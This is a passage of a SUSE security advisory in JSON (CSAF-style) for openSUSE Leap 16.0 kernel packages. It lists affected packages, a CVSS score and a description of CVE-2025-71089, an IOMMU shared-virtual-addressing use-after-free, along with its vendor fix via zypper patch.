"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
